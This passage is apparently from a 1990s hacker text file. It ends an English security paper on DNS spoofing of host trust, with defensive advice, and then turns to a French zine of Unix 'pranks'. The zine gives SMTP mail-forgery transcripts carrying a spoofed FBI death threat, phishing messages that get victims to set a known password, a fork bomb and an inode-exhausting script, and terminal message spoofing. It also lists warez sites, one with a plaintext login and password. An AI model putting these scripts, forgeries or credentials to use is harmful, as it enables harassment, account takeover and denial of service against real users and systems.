  3044. There are many ways that a host can trust: .rhosts and hosts.equiv files
  3045. that allow access without password verification; window servers that
  3046. allow remote systems to use and abuse privileges; export files that
  3047. control access via NFS, and more.
  3048.  
  3049. Nearly all of these rely on client IP address to hostname conversion to
  3050. determine whether or not service is to be granted.  The simplest method
  3051. uses the /etc/hosts file for a direct lookup.  However, today most hosts
  3052. use either DNS (the Domain Name Service), NIS, or both for name lookup
  3053. service.  A reverse lookup occurs when a server has an IP address (from
  3054. a client host connecting to it) and wishes to get the corresponding
  3055. client hostname.
  3056.  
  3057. Although the concept of how host trust works is well understood by most
  3058. system administrators, the _dangers_ of trust, and the _practical_
  3059. problem it represents, irrespective of hostname impersonation, is one of
  3060. the least understood problems we know of on the Internet.  This goes far
  3061. beyond the obvious hosts.equiv and rhosts files; NFS, NIS, windowing
  3062. systems -- indeed, much of the useful services in UNIX are based on the
  3063. concept that well known (to an administrator or user) sites are trusted
  3064. in some way.  What is not understood is how networking so tightly binds
  3065. security between what are normally considered disjoint hosts.
  3066.  
  3067. Any form of trust can be spoofed, fooled, or subverted, especially when
  3068. the authority that gets queried to check the credentials of the client
  3069. is either outside of the server's administrative domain, or when the
  3070. trust mechanism is based on something that has a weak form of
  3071. authentication; both are usually the case.
  3072.  
  3073. Obviously, if the host containing the database (either NIS, DNS, or
  3074. whatever) has been compromised, the intruder can convince the target
  3075. host that s/he is coming from any trusted host; it is now sufficient to
  3076. find out which hosts are trusted by the target.  This task is often
  3077. greatly helped by examining where system administrators and system
  3078. accounts (such as root, etc.) last logged in from.  Going back to our
  3079. target, victim.com, you note that root and some other system accounts
  3080. logged in from big.victim.com. You change the PTR record for evil.com so
  3081. that when you attempt to rlogin in from evil.com to victim.com,
  3082. victim.com will attempt to look up your hostname and will find what you
  3083. placed in the record.  If the record in the DNS database looks like:
  3084.  
  3085.  1.192.192.192.in-addr.arpa     IN      PTR     evil.com
  3086.  
  3087. And you change it to:
  3088.  
  3089.  1.192.192.192.in-addr.arpa     IN      PTR     big.victim.com
  3090.  
  3091. then, depending on how naive victim.com's system software is, victim.com
  3092. will believe the login comes from big.victim.com, and, assuming that
  3093. big.victim.com is in the /etc/hosts.equiv or /.rhosts files, you will be
  3094. able to login without supplying a password.  With NIS, it is a simple
  3095. matter of either editing the host database on the NIS master (if this is
  3096. controlled by the intruder) or of spoofing or forcing NIS (see
  3097. discussion on NIS security above) to supply the target with whatever
  3098. information you desire.  Although more complex, interesting, and
  3099. damaging attacks can be mounted via DNS, time and space don't allow
  3100. coverage of these methods here.
  3101.  
  3102. Two methods can be used to prevent such attacks.  The first is the most
  3103. direct, but perhaps the most impractical.  If your site doesn't use any
  3104. trust, you won't be as vulnerable to host spoofing.  The other strategy
  3105. is to use cryptographic protocols.  Using the secure RPC protocol (used
  3106. in secure NFS, NIS+, etc.) is one method; although it has been "broken"
  3107. cryptographically, it still provides better assurance than RPC
  3108. authentication schemes that do not use any form of encryption.  Other
  3109. solutions, both hardware (smartcards) and software (Kerberos), are being
  3110. developed, but they are either incomplete or require changes to system
  3111. software.
  3112.  
  3113. Appendix B details the results of an informal survey taken from a
  3114. variety of hosts on the Internet.
  3115.  
  3116. Protecting the system
  3117. ---------------------
  3118.  
  3119. It is our hope that we have demonstrated that even some of the most
  3120. seemingly innocuous services run can offer (sometimes unexpectedly)
  3121. ammunition to determined system crackers.  But, of course, if security
  3122. were all that mattered, computers would never be turned on, let alone
  3123. hooked into a network with literally millions of potential intruders.
  3124. Rather than reiterating specific advice on what to switch on or off, we
  3125. instead offer some general suggestions:
  3126.  
  3127. o  If you cannot turn off the finger service, consider installing a
  3128. modified finger daemon.  It is rarely necessary to reveal a user's home
  3129. directory and the source of last login.
  3130.  
  3131. o  Don't run NIS unless it's absolutely necessary.  Use NFS as little
  3132. as possible.
  3133.  
  3134. o  Never export NFS filesystems unrestricted to the world. Try to
  3135. export file systems read-only where possible.
  3136.  
  3137. o  Fortify and protect servers (e.g. hosts that provide a service to
  3138. other hosts -- NFS, NIS, DNS, whatever.)  Only allow administrative
  3139. accounts on these hosts.
  3140.  
  3141. o  Examine carefully services offered by inetd and the portmapper.
  3142. Eliminate any that aren't explicitly needed.  Use Wietse Venema's inetd
  3143. wrappers, if for no other reason than to log the sources of connections
  3144. to your host.  This adds immeasurably to the standard UNIX auditing
  3145. features, especially with respect to network attacks.  If possible, use
  3146. the loghost mechanism of syslog to collect security-related information
  3147. on a secure host.
  3148.  
  3149. o  Eliminate trust unless there is an absolute need for it.  Trust is
  3150. your enemy.
  3151.  
  3152. o  Use shadow passwords and a passwd command that disallows poor
  3153. passwords.  Disable or delete unused/dormant system or user accounts.
  3154.  
  3155. o  Keep abreast of current literature (see our suggested reading list and
  3156. bibliography at the end of this paper) and security tools; communicate
  3157. to others about security problems and incidents.  At minimum, subscribe
  3158. to the CERT mailing list and phrack magazine (plus the firewalls mailing
  3159. list, if your site is using or thinking about installing a firewall) and
  3160. read the usenet security newsgroups to get the latest information on
  3161. security problems.  Ignorance is the deadliest security problem we are
  3162. aware of.
  3163.  
  3164. o  Install all vendor security patches as soon as possible, on all of
  3165. your hosts.  Examine security patch information for other vendors - many
  3166. bugs (rdist, sendmail) are common to many UNIX variants.
  3167.  
  3168. It is interesting to note that common solutions to security problems
  3169. such as running Kerberos or using one-time passwords or digital tokens
  3170. are ineffective against most of the attacks we discuss here.  We
  3171. heartily recommend the use of such systems, but be aware that they are
  3172. _not_ a total security solution -- they are part of a larger struggle to
  3173. defend your system.
  3174.  
  3175. Conclusions
  3176. -----------
  3177.  
  3178. Perhaps none of the methods shown here are surprising; when writing this
  3179. paper, we didn't learn very much about how to break into systems.  What
  3180. we _did_ learn was, while testing these methods out on our own systems
  3181. and that of friendly sites, just how effective this set of methods is
  3182. for gaining access to a typical (UNIX) Internet host.  Tiring of trying
  3183. to type these in all by hand, and desiring to keep our own systems more
  3184. secure, we decided to implement a security tool (SATAN) that attempts to
  3185. check remote hosts for at least some of the problems discussed here.
  3186. The typical response, when telling people about our paper and our tool
  3187. was something on the order of "that sounds pretty dangerous -- I hope
  3188. you're not going to give it out to everybody.  But you since you can
  3189. trust me, may I have a copy of it?"
  3190.  
  3191. We never set out to create a cookbook or toolkit of methods and programs
  3192. on how to break into systems -- instead, we saw that these same methods
  3193. were being used, every day, against ourselves and against friendly
  3194. system administrators.  We believe that by propagating information that
  3195. normally wasn't available to those outside of the underworld, we can
  3196. increase security by raising awareness.  Trying to restrict access to
  3197. "dangerous" security information has never seemed to be a very effective
  3198. method for increasing security; indeed, the opposite appears to be the
  3199. case, since the system crackers have shown little reticence to share
  3200. their information with each other.
  3201.  
  3202. While it is almost certain that some of the information presented here
  3203. is new material to (aspiring) system crackers, and that some will use it
  3204. to gain unauthorized entrance onto hosts, the evidence presented even by
  3205. our ad hoc tests shows that there is a much larger number of insecure
  3206. sites, simply because the system administrators don't know any better --
  3207. they aren't stupid or slow, they simply are unable to spend the very
  3208. little free time that they have to explore all of the security issues
  3209. that pertain to their systems.  Combine that with no easy access to this
  3210. sort of information and you have poorly defended systems.  We (modestly)
  3211. hope that this paper will provide badly-needed data on how systems are
  3212. broken into, and further, to explain _why_ certain steps should be taken
  3213. to secure a system.  Knowing why something is a problem is, in our
  3214. opinion, the real key to learning and to making an informed, intelligent
  3215. choice as to what security really means for your site.
  3216.  
  3217. ----
  3218.  
  3219. Appendix A:
  3220.  
  3221. SATAN (Security Analysis Tool for Auditing Networks)
  3222.  
  3223. Originally conceived some years ago, SATAN is actually the prototype of
  3224. a much larger and more comprehensive vision of a security tool.  In its
  3225. current incarnation, SATAN remotely probes and reports various bugs and
  3226. weaknesses in network services and windowing systems, as well as
  3227. detailing as much generally useful information as possible about the
  3228. target(s).  It then processes the data with a crude filter and what
  3229. might be termed an expert system to generate the final security
  3230. analysis.  While not particularly fast, it is extremely modular and easy
  3231. to modify.
  3232.  
  3233. SATAN consists of several sub-programs, each of which is an executable
  3234. file (perl, shell, compiled C binary, whatever) that tests a host for a
  3235. given potential weakness.  Adding further test programs is as simple as
  3236. putting an executable into the main directory with the extension ".sat";
  3237. the driver program will automatically execute it.  The driver generates
  3238. a set of targets (using DNS and a fast version of ping together to get
  3239. "live" targets), and then executes each of the programs over each of the
  3240. targets.  A data filtering/interpreting program then analyzes the
  3241. output, and lastly a reporting program digests everything into a more
  3242. readable format.
  3243.  
  3244. The entire package, including source code and documentation, will be
  3245. made freely available to the public, via anonymous ftp and by posting it
  3246. to one of the numerous source code groups on the Usenet.
  3247.  
  3248. ----
  3249.  
  3250. Appendix B:
  3251.  
  3252. An informal survey conducted on about a dozen Internet sites
  3253. (educational, military, and commercial, with over 200 hosts and 40000
  3254. accounts) revealed that on the average, close to 10 percent of a site's
  3255. accounts had .rhosts files.  These files averaged six trusted hosts
  3256. each; however, it was not uncommon to have well over one hundred entries
  3257. in an account's .rhosts file, and on a few occasions, the number was
  3258. over five hundred!  (This is not a record one should be proud of
  3259. owning.)  In addition, _every_ site directly on the internet (one site
  3260. was mostly behind a firewall) trusted a user or host at another site --
  3261. thus, the security of the site was not under the system administrators
  3262. direct control.  The larger sites, with more users and hosts, had a
  3263. lower percentage of users with .rhosts files, but the size of .rhosts
  3264. files increased, as well as the number of trusted off-site hosts.
  3265.  
  3266. Although it was very difficult to verify how many of the entries were
  3267. valid, with such hostnames such as "Makefile", "Message-Id:", and
  3268. "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", as well as quite a few wildcard entries, we
  3269. question the wisdom of putting a site's security in the hands of its
  3270. users.  Many users (especially the ones with larger .rhosts files)
  3271. attempted to put shell-style comments in their .rhosts files, which most
  3272. UNIX systems attempt to resolve as valid host names.  Unfortunately, an
  3273. attacker can then use the DNS and NIS hostname spoofing techniques
  3274. discussed earlier to set their hostname to "#" and freely log in.  This
  3275. puts a great many sites at risk (at least one major vendor ships their
  3276. systems with comments in their /etc/hosts.equiv files.)
  3277.  
  3278. You might think that these sites were not typical, and, as a matter of
  3279. fact, they weren't.  Virtually all of the administrators knew a great
  3280. deal about security and write security programs for a hobby or
  3281. profession, and many of the sites that they worked for did either
  3282. security research or created security products.  We can only guess at
  3283. what a "typical" site might look like.
  3284.  
  3285. ----
  3286.  
  3287. Appendix C:
  3288.  
  3289. After receiving mail from a site that had been broken into from one of
  3290. our systems, an investigation was started.  In time, we found that the
  3291. intruder was working from a list of ".com" (commercial) sites, looking
  3292. for hosts with easy-to steal password files.  In this case,
  3293. "easy-to-steal" referred to sites with a guessable NIS domainname and an
  3294. accessible NIS server.  Not knowing how far the intruder had gotten, it
  3295. looked like a good idea to warn the sites that were in fact vulnerable
  3296. to password file theft.  Of the 656 hosts in the intruder's hit list, 24
  3297. had easy-to-steal password files -- about one in twenty-five hosts!  One
  3298. third of these files contained at least one password-less account with
  3299. an interactive shell.  With a grand total of 1594 password-file entries,
  3300. a ten-minute run of a publically-available password cracker (Crack)
  3301. revealed more than 50 passwords, using nothing but a low-end Sun
  3302. workstation.  Another 40 passwords were found within the next 20
  3303. minutes; and a root password was found in just over an hour. The result
  3304. after a few days of cracking: five root passwords found, 19 out of 24
  3305. password files (eighty percent) with at least one known password, and
  3306. 259 of 1594 (one in six) passwords guessed.
  3307.  
  3308. ----
  3309.  
  3310. Appendix D:
  3311.  
  3312. How to get some free security resources on the Internet
  3313.  
  3314. Mailing lists:
  3315.  
  3316. o  The CERT (Computer Emergency Response Team) advisory mailing list.
  3317. Send e-mail to cert@cert.org, and ask to be placed on their mailing
  3318. list.
  3319.  
  3320. o  The Phrack newsletter.  Send an e-mail message to
  3321. phrack@well.sf.ca.us and ask to be added to the list.
  3322.  
  3323. o  The Firewalls mailing list.  Send the following line to
  3324. majordomo@greatcircle.com:
  3325.  
  3326.     subscribe firewalls
  3327.  
  3328. o  Computer Underground Digest.  Send e-mail to
  3329. tk0jut2@mvs.cso.niu.edu, asking to be placed on the list.
  3330.  
  3331. Free Software:
  3332.  
  3333. COPS (Computer Oracle and Password System) is available via anonymous
  3334. ftp from archive.cis.ohio-state.edu, in pub/cops/1.04+.
  3335.  
  3336. The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl,
  3337. in pub/security.
  3338.  
  3339. The latest version of berkeley sendmail is available via anonymous ftp
  3340. from ftp.cs.berkeley.edu, in ucb/sendmail.
  3341.  
  3342. Sources for ftpd and many other network utilities can be found in
  3343. ftp.uu.net, in packages/bsd-sources.
  3344.  
  3345. Source for ISS (Internet Security Scanner), a tool that remotely scans
  3346. for various network vulnerabilities, is available via anonymous ftp from
  3347. ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
  3348.  
  3349. Securelib is available via anonymous ftp from ftp.uu.net, in
  3350. usenet/comp.sources.misc/volume36/securelib.
  3351.  
  3352. ----
  3353.  
  3354. Bibliography:
  3355.  
  3356. Baldwin, Robert W., Rule Based Analysis of Computer Security,
  3357. Massachusetts Institute of Technology, June 1987.
  3358.  
  3359. Bellovin, Steve, Using the Domain Name System for System Break-ins,
  3360. 1992 (unpublished).
  3361.  
  3362. Massachusetts Institute of Technology, X Window System Protocol,
  3363. Version 11, 1990.
  3364.  
  3365. Shimomura, Tsutomu, private communication.
  3366.  
  3367. Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.
  3368.  
  3369. ----
  3370.  
  3371. Suggested reading:
  3372.  
  3373. Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite", 
  3374. Computer Communication Review 19 (2), 1989; a comment by Stephen
  3375. Kent appears in volume 19 (3), 1989.
  3376.  
  3377. Garfinkle, Simson and Spafford, Gene, "Practical UNIX Security",
  3378. O'Reilly and Associates, Inc., 1992.
  3379.  
  3380. Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
  3381. Study: Network Information Service", Computer Communication Review
  3382. 22 (5) 1992.
  3383.  
  3384. Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume
  3385. Four, Issue Forty-Three, File 14 of 27.
  3386.  
  3387. Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept
  3388. 1993.
  3389.  
  3390. Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
  3391. Protocal", Purdue University, August 1993.
  3392.  
  3393. Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM
  3394. 27 (8), 1984.
  3395.  
  3396.  
  3397.                                -%!% N0 Way %!%-
  3398.  
  3399.                       Volume I,   Numéro 3,  Partie 3.12
  3400.  
  3401.                        o/~ Paranoia ! o/~ Paranoia o/~
  3402.             ---===***###>   Plaisanter sous Unix   <###***===---
  3403.                            o/~ They are Back ! o/~
  3404.  
  3405.         Vous vous etes toujours demandé comment jouer des farces sous Unix,
  3406. comment foutres les boules a vos potes, a votre administrateur, jouer au con
  3407. avec le psyche des autres, faire du SEAO?  Eh bien voila le but de cet autre
  3408. petit ++N-Phile.  Amusez vous bien !
  3409.  
  3410. [ nota : tout ce qui est tapé au clavier est précédé de ">>>" ]
  3411.  
  3412. > Mailer sous un autre nom:
  3413.   ========================
  3414. Pour cela, il faut connaitre les bases du transfer de mail.  Le mail sous Unix
  3415. est transporte de machine en machine par "sendmail" qui écoute les messages des
  3416. autres mailers ou de ses clients sur le port TCP numéro 25.
  3417.  
  3418. DaubeNet {101} grep smtp /etc/services
  3419. smtp            25/tcp          mail
  3420.  
  3421. Donc il suffit de se connecter la bas et de respecter le protocole SMTP
  3422. (Simple Message Transfer Protocol) plus une petite astuce pour faire un faux
  3423. mail qui pourrait venir de n'importe ou.
  3424.  
  3425. ----------------------
  3426. DaubeNet {102} >>> telnet localhost 25
  3427. Trying 127.0.0.1...
  3428. Connected to univ-anon.fr.
  3429. Escape character is '^]'.
  3430. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:51:55 -0600
  3431. 220 ESMTP spoken here
  3432. >>>help
  3433. 214-Commands:
  3434. 214-    HELO    EHLO    MAIL    RCPT    DATA
  3435. 214-    RSET    NOOP    QUIT    HELP    VRFY
  3436. 214-    EXPN    VERB
  3437. 214-For more info use "HELP <topic>".
  3438. 214-To report bugs in the implementation send email to
  3439. 214-    sendmail@CS.Berkeley.EDU.
  3440. 214-For local information send email to Postmaster at your site.
  3441. 214 End of HELP info
  3442. >>>help helo
  3443. 214-HELO <hostname>
  3444. 214-    Introduce yourself.
  3445. 214 End of HELP info
  3446. >>>help mail
  3447. 214-MAIL FROM: <sender>
  3448. 214-    Specifies the sender.
  3449. 214 End of HELP info
  3450. >>>help rcpt
  3451. 214-RCPT TO: <recipient>
  3452. 214-    Specifies the recipient.  Can be used any number of times.
  3453. 214 End of HELP info
  3454. >>>help data
  3455. 214-DATA
  3456. 214-    Following text is collected as the message.
  3457. 214-    End with a single dot.
  3458. 214 End of HELP info
  3459. >>>help quit
  3460. 214-QUIT
  3461. 214-    Exit sendmail (SMTP).
  3462. 214 End of HELP info
  3463. >>>quit
  3464. 221 DaubeNet closing connection
  3465. Connection closed by foreign host.
  3466. ----------------------
  3467.  
  3468. Voila dans l'ordre les syntaxe des commandes que l'on va utiliser poru forger
  3469. un mail.  C'est très facile mais il y a une bidouille qu'il faut connaitre et
  3470. qui vous trahi si vous ne la connaissez pas.
  3471.  
  3472. ----------------------
  3473. DaubeNet {103} >>> telnet localhost 25
  3474. Trying 127.0.0.1...
  3475. Connected to univ-anon.fr.
  3476. Escape character is '^]'.
  3477. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:52:53 -0600
  3478. 220 ESMTP spoken here
  3479. >>>helo ducon.fbi.com
  3480. 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
  3481. >>>mail from: root@ducon.fbi.com
  3482. 250 root@ducon.fbi.com... Sender ok
  3483. >>>rcpt to: fred
  3484. 250 fred... Recipient ok
  3485. >>>data
  3486. 354 Enter mail, end with "." on a line by itself
  3487. >>>
  3488. >>>Please, would you stop playing with my Unix system otherwise i'll
  3489. >>>send a wet operation commando to your university.
  3490. >>>
  3491. >>>Nigel X.
  3492. >>>System Administrator at FBI Inc.
  3493. >>>root@fbi.com
  3494. >>>.
  3495. 250 DAA00299 Message accepted for delivery
  3496. >>>quit
  3497. 221 DaubeNet closing connection
  3498. Connection closed by foreign host.
  3499. ----------------------
  3500.  
  3501. Haha, ca y est, on a envoyé notre petite bidouille et le mec va avoir les
  3502. jetons de sa vie:
  3503.  
  3504. ----------------------
  3505. DaubeNet {104} >>> mail
  3506. Mail version 5.5 6/1/90.  Type ? for help.
  3507. "/var/mail/fred": 1 message 1 new
  3508. >N  1 root@ducon.fbi.com    Thu Sep 15 03:55  14/508  
  3509. & >>>1
  3510. Message 1:
  3511. From root@ducon.fbi.com Thu Sep 15 03:55:03 1994
  3512. From: root@ducon.fbi.com
  3513. Apparently-To: fred                     [ * ]
  3514.  
  3515. Please, would you stop playing with my Unix system otherwise i'll
  3516. send a wet operation commando to your university.
  3517.  
  3518. Nigel X.
  3519. System Administrator at FBI Inc.
  3520. root@fbi.com
  3521.  
  3522. & >>>d
  3523. & >>>q
  3524. ----------------------
  3525.  
  3526. Arghh... Vous avez vu comme moi la ligne ou j'ai mis une astérisque entre
  3527. crochets : C'est marqué: "Apparently-To: " arghhh... Ca fait vraiment pas
  3528. serieux n'est ce pas?
  3529. C'est ce qui vous trahi quand vous ne connaissez pas la bidouille.
  3530. Et en parlant de bidouille, la voici...
  3531.  
  3532. ----------------------
  3533. DaubeNet {105} >>> telnet localhost 25
  3534. Trying 127.0.0.1...
  3535. Connected to univ-anon.fr.
  3536. Escape character is '^]'.
  3537. 220-DaubeNet Sendmail 8.6.5/8.6.5 ready at Thu, 15 Sep 1994 03:55:43 -0600
  3538. 220 ESMTP spoken here
  3539. >>>helo
  3540. 250 DaubeNet Hello univ-anon.fr [127.0.0.1], pleased to meet you
  3541. >>>mail from: root@fbi.com
  3542. 250 root@fbi.com... Sender ok
  3543. >>>rcpt to: fred
  3544. 250 fred... Recipient ok
  3545. >>>data
  3546. 354 Enter mail, end with "." on a line by itself
  3547. >>>To: fred@univ-anon.fr                   [ * ]
  3548. >>>
  3549. >>>Good afternoon,
  3550. >>>
  3551. >>>        Could you please stop playing with my unix system otherwise i'll
  3552. >>>be forced to send one of our wet operations' commando to execute you.
  3553. >>>
  3554. >>>Nigel X, System Administrator at Fbi Inc.
  3555. >>>.
  3556. 250 DAA00307 Message accepted for delivery
  3557. >>>quit
  3558. 221 DaubeNet closing connection
  3559. Connection closed by foreign host.
  3560. ----------------------
  3561.  
  3562. Vous regarderez attentivement la premiere ligne tapée après le DATA.
  3563. C'est un "To: " suivi de l'adresse a qui on envoie...
  3564. Et voila le résultat:
  3565.  
  3566. ----------------------
  3567. DaubeNet {106} >>> mail
  3568. Mail version 5.5 6/1/90.  Type ? for help.
  3569. "/var/mail/fred": 1 message 1 new
  3570. >N  1 root@fbi.com          Thu Sep 15 03:57  14/509  
  3571. & >>>1
  3572. Message 1:
  3573. From root@fbi.com Thu Sep 15 03:57:41 1994
  3574. From: root@fbi.com
  3575. To: fred@univ-anon.fr
  3576.  
  3577. Good afternoon,
  3578.  
  3579.     Could you please stop playing with my unix system otherwise i'll
  3580. be forced to send one of our wet operations' commando to execute you.
  3581.  
  3582. Nigel X, System Administrator at Fbi Inc.
  3583.  
  3584. & >>>d
  3585. & >>>q
  3586. DaubeNet {107} exit
  3587. ----------------------
  3588.  
  3589. C'est beau non la technique... ;)
  3590.  
  3591. Grace à cela vous pouvez commencer à lancer la terreur sur votre réseau.
  3592.  
  3593. Hacking Psychology:
  3594. ==================
  3595.         Les utilisateurs sont par définition très soumis (et c'est pour cela
  3596. que l'on distingue les hackers, ils refusent cette soumission.) Pour un user
  3597. lambda, tout ce qui vient du Mail est vrais, sacre et tout alors que n'importe
  3598. qui peut faire du faux mail...
  3599.  
  3600.         Bien sur, on peut faire des mail bombs de 800 kilo octets qui vont
  3601. completement flooder toute la boite aux lettre de votre/vos victime(s).
  3602.  
  3603.         Mais il y a plus interressant.
  3604. Imaginez que quelqu'un recoive un message de: security-daemon@<votre site>
  3605. disant:
  3606. -----
  3607. * This is and automated mailing : don't reply *
  3608.  
  3609.         We have found that your password is insecure. You should change this
  3610. otherwise your account will be disabled.
  3611.  
  3612. Please use the password "ItG-4v3" instead.
  3613.  
  3614. Thank you.
  3615. Security Daemon.
  3616. -----
  3617. Ainsi, vous pouvez donner beaucoup de passwords et ainsi controller pas mal de
  3618. comptes.  Une fois, j'ai réussi même à faire changer le mot de passe de
  3619. *l'admin* !!!!!  Quel con, il obéit à des packages de sécurité qu'il n'a même
  3620. pas installé.  AHahaha !
  3621.  
  3622. Foutre un systeme sur les genoux:
  3623. ================================
  3624. Pour cela il y a des petits trucs tout con à faire si vous n'avez pas
  3625. d'accounting:
  3626. créez un petit script "toto" de ce type:
  3627. #!/bin/sh
  3628. mkdir ./-fuck
  3629. cp ./toto ./-fuck/toto
  3630. cd ./-fuck
  3631. ./toto
  3632.  
  3633. Hehe, le truc va faire de plus en plus de directory et la machine s'arretera
  3634. par manque d'inode.
  3635.  
  3636. On peut aussi faire dans le meme genre un fichier "foo":
  3637. #!/bin/csh
  3638. ./foo &
  3639. ./foo &
  3640. ./foo &
  3641.  
  3642. hehe, effet tout aussi garanti...
  3643.  
  3644. On peut même mixer les deux !
  3645.  
  3646. Les messages fantomes:
  3647. =====================
  3648.         Vous savez, quand vous faites un write la personne à qui il est déstiné
  3649. recoit:
  3650. Message from <luser> at/...
  3651. Ca serait marrant si vous pouviez vous faire passer pour d'autres personnes
  3652. non??
  3653. Eh bien c'est possible:
  3654. Il faut savoir comment ca marche.  Chaque utilisateur loggé a au moins un
  3655. terminal.  Ce terminal est représenté dans le système Unix comme un nom de
  3656. périphérique du type: /dev/ttyXX ou XX est généralement un nombre ou une lettre
  3657. et un nombre.
  3658. Bref, c'est la dessus qu'écrit la commande write.
  3659. Le "msg on" ou "msg off" que l'on tape modifie simplement la protection en
  3660. écriture sur ce périphérique.   Sur les anciens système, l'appel système
  3661. vhangup() n'éxistait pas et on pouvait donc se connecter, regarder les
  3662. terminaux disponibles (nons attribués à des users donc en lecture et ecriture
  3663. pour tout le monde) et faire un cat dessus comme ceci:
  3664. $ cat >/dev/tty02
  3665. ensuite faire un control-Z pour le stopper et attendre que quelqu'un se logge
  3666. par ce terminal.
  3667. Ensuite, préparer a coté le :
  3668.  
  3669. Message from root at...
  3670. Veuillez changer immédiatement votre mot de passe en: "TuY5;tK"
  3671. Merci. Votre administrateur système.
  3672. <EOT>
  3673.  
  3674. Fun isn't it?
  3675.  
  3676. S'amuser avec les émulateurs de terminaux:
  3677. =========================================
  3678.         Vous savez que par exemple zmodem envoie une chaine de caractère qui
  3679. lance automatiquement Zmodem en reception du cote de l'émulateur de terminaux.
  3680. C'est très interressant car on peut faire appeler intempestivement Zmodem dans
  3681. l'émulateur si telle ou telle personne en message on utilise un émulateur de
  3682. terminaux.
  3683.  
  3684. Il suffit d'enregistrer la séquence envoyée par Zmodem pour déclancher l'appel
  3685. de Zmodem et hop, bienvenue en enfer !
  3686.  
  3687. Un petit programe fait cela entre autre dans les sessions Talk, c'est flash2.c
  3688. et son ancetre qui ne le fait pas mais est sympa: flash.c.
  3689.  
  3690.                                -%!% N0 Way %!%-
  3691.  
  3692.                       Volume I,   Numéro 3,  Partie 3.13
  3693.  
  3694.  
  3695.                           ^^^^^^^^^^^^^^^^^^^^^^^^^
  3696.                           >>>>>>>> du cote <<<<<<<<
  3697.                           ======= d'internet ======
  3698.                           vvvvvvvvvvvvvvvvvvvvvvvvv
  3699.  
  3700.  Chez les internetiens, ca a bougé sacrement, apres les emmerde de Philip
  3701. Zimmerman accusé par la NSA et la CIA d'avoir exporté un logiciel de
  3702. cryptographie (PGP) les hackers se sont mis a remuer sec.
  3703.  Le probleme de PGP a été résolu, la version 2.5 est interdite à l'export
  3704. mais la 2.6 est okay et exportable !
  3705. STICK WITH 2.5, IT'S THE MOST SECURE!
  3706.  
  3707.  Les experts en sécurité d'une grosse agence francaise ont déclaré recemment:
  3708. "On leur a bien fait la nique"...
  3709.  
  3710. J'ai bien peur que la plus grosse "nique" ce soit nous qui la faisions
  3711. prochainnement.  En effet, beaucoup de jeunes hackers se sont lancés a fond
  3712. dans le hack professionel.
  3713.  
  3714. Grace à des listes de diffusions comme 8lgm et bugtraq, ils ont acqui un
  3715. savoir faire impressionant.  A suivre...
  3716.  
  3717.                           | Underground sites |
  3718.  
  3719.         Sur Internet, il y a des serveurs FTP ou FSP qui hébergent sans le
  3720. savoir des sanctuaires du hacking ou de la scene 0-day warez.
  3721. Voici une petite liste qui a été récuperée aux USA:
  3722. ============
  3723.                        ----++++ Betaz List ++++----
  3724.                       -= These sites are up 9.05.94 =-
  3725. ------------------------------------------------------------------------------
  3726.  FTP
  3727.  ~~~ 
  3728.    sy2000.cet.fsu.edu   /incoming/msdos/.<tab>/.^l^k       pc|mac|fast
  3729.    cs.uidaho.edu        /pub/incoming/MacPGP/"<tab><tab>"  pc|mac
  3730.    130.246.23.9         /pub/others/"..  "/"..   "         pc|mac
  3731.    130.246.17.54        /pub/"..  "/".cache  "             "   "   
  3732.    brinta.ptf.hro.nl    ** Private **
  3733.    160.78.31.26         /incoming/"..  "                   pc
  3734.    ic16.ee.umanitoba.ca /pub/PSCAD_RTDS/incoming/te        few
  3735.    acme.fred.org        /pub/msdos/Tmp/^X                  few
  3736.    
  3737.  Console
  3738.  ~~~~~~~
  3739.    syr.edu             /software/unix/kip/dpf              snes|sega
  3740.    131.215.46.20  1717   snesapalooza
  3741.  
  3742.   To add to or recieve an updated list
  3743.   mail an112452 or msg betaz on irc 
  3744. ============
  3745.         Voila, donc vous pouvez aller y faire des tours, c'est pas mal.
  3746. Ce sont des warez en general de bonne qualité.
  3747.  
  3748.         Et voila une autre liste:
  3749. ============
  3750. FDISK and FERN's Warez List    9:09PM  8/24/94  Atlantic        FDISK V5.6
  3751. All of the sites have been test as of the date and time above
  3752.  
  3753. FTP
  3754. Site            Dir                                             Submitted By
  3755. --------------------------------------------------------------------
  3756. corto.inria.fr  /broadcast/^K^E^F^E^L                           Skippy
  3757. tiger.vut.edu.au  login:r9202044        Pass:Daavee     "..     "
  3758. 192.54.41.33    /pub/avs_mirror/pub/siggraph/uploads/"..."      cc
  3759. acme.fred.org  /pub/msdos/tmp/"..  "                            swazi
  3760. 130.246.23.9    /pub/others                                     Hi-Fi
  3761.  
  3762. Site            Port                            Submitted By
  3763. --------------------------------------------------------------------
  3764. 130.161.39.3    5300                            Wowzer
  3765. 128.206.29.11   12321                           Bryer
  3766. 158.132.79.228  1997                            casey(anon 10285)
  3767. ============
  3768.  
  3769.                                 | IRC |
  3770.  
  3771.         Vous connaissez IRC?  L'Internet Relay Chat...  C'est le havre dans
  3772. lequel tous les internet junkies viennent discuter de n'importe quoi.
  3773.  
  3774. Un des "channel" les plus virulent est #hack (suivi de pres par #warez et
  3775. #phreak).  La dedans se livre une petite guerre permanente à qui aura les
  3776. droits operateurs sur le channel, pour cela, nous avons recours à des outils
  3777. assez rigolos.  Tout d'abord, chaque bon hacker qui se respecte a sa propre
  3778. armure personnelle le protegeant des divers Tsunamis ou Rolling Bombs qui ne
  3779. sont que des attaques software destinées à virer quelqu'un du channel.
  3780. Les plus connus de ces logiciels sont GargOyle et Serpent de Vassago, personnage
  3781. tres controversé sur Internet.
  3782. (gargoyle.tar.Z, serpent.tar.Z, ircdfens.tar.Z, util662.tar.Z, textbox.tar.Z)
  3783. Ensuite vient le hack hard qui passe souvent par l'arret de serveur IRC
  3784. isolant un connecte de l'ensemble des autres connecte et qui donne ainsi les
  3785. chanops (channel operators) au connecte isole.
  3786. Fun isn't it?
  3787.  
